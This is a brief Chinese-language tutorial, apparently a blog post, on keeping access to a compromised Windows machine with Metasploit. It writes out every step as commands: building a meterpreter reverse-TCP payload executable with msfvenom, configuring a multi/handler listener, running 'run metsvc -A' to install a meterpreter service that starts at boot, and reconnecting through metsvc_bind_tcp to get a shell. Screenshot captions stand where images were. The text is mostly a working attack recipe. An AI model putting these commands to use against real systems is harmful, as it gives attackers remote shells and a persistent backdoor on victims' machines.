首先,我们先生成一个 PAYLOAD : 

msfpayload(msfvenom) windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1218 X >xx.exe

MSF之persistence权限维持_目标系统

接着,我们来配置一个反弹会话的监听处理:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.2.133

set LPORT 1218

exploit

MSF之persistence权限维持_自动启动_02

此时,当目标系统成功运行我们之前配置好的 PAYLOAD 后,我们就可以获取到一个 meterpreter 的反弹连接 shell 。接着我们在当前 shell 下,输入命令:

run metsvc -A

注:该条命令执行成功后,会在目标系统自动创建一个 meterpreter 的 serverces ,并自动保存为开机自动启动!

MSF之persistence权限维持_自动保存_03

 

最后,我们再来启动一个反弹会话处理程序:

use exploit/multi/handler

set payload windows/metsvc_bind_tcp

set RHOST 192.168.2.132

set LPORT 31337 (默认)

exploit

 

MSF之persistence权限维持_目标系统_04

完成以上操作,我们很快会得到一个反弹 shell :

shell

MSF之persistence权限维持_自动保存_05

成功取得目标系统的 shell 操作权限!